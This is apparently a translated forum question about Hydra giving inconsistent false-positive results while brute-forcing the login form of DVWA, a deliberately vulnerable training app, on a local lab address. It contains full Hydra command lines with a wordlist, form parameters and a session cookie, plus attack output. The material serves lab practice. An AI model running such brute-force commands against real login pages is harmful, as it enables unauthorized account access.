Tengo un problema con Hydra cuando lo uso. He intentado las mismas líneas de comando que se encuentran en las guías directamente soportadas por la aplicación web maldita vulnerable (DVWA) v1.8.
Ok, entonces ... aquí está mi salida de intento ...
root@kali:~# hydra 192.168.1.2 -l admin -P /wordlists/500-worst-passwords.txt
http-get-form "/DVWA-1.0.8/vulnerabilities/brute/index.php:username=^USER^&
password=^PASS^&submit=Login:Username and/or password incorrect." -f
Hydra v7.3 (c)2012 by van Hauser/THC & David Maciejak - for legal purposes only
Hydra (http://www.thc.org/thc-hydra) starting at 2013-09-06 05:18:12
[DATA] 16 tasks, 1 server, 500 login tries (l:1/p:500), ~31 tries per task
[DATA] attacking service http-get-form on port 80
[80][www-form] host: 192.168.1.2 login: admin password: shadow
[STATUS] attack finished for 192.168.1.2 (valid pair found)
1 of 1 target successfuly completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2013-09-06 05:18:12
Sí, es cierto que el método de formulario HTML es GET. : O)
Bien, independientemente de cuántas veces ejecute el comando, obtengo respuestas diferentes ... como ...
Intento 1
[80][www-form] host: 192.168.1.2 login: admin password: 101193
[80][www-form] host: 192.168.1.2 login: admin password: horse
Intento 2
[80][www-form] host: 192.168.1.2 login: admin password: carhorn
[80][www-form] host: 192.168.1.2 login: admin password: shadowfox
[80][www-form] host: 192.168.1.2 login: admin password: multible
ACTUALIZACIÓN !!!!
hydra 192.168.1.2 -l admin -P /wordlists/500-worst-passwords.txt http-get-form
"/DVWA-1.0.8/vulnerabilities/brute/index.php:username=^USER^&password=^PASS^&
submit=Login:Username and/or password incorrect.:H=Cookie: security=high;
PHPSESSID=jtujthkeh08foqfomph232rp77"
Intenté agregar la identificación de la sesión de cookies también. También intenté poner en el:
-t <tasks>
Hasta ahora no he tenido éxito.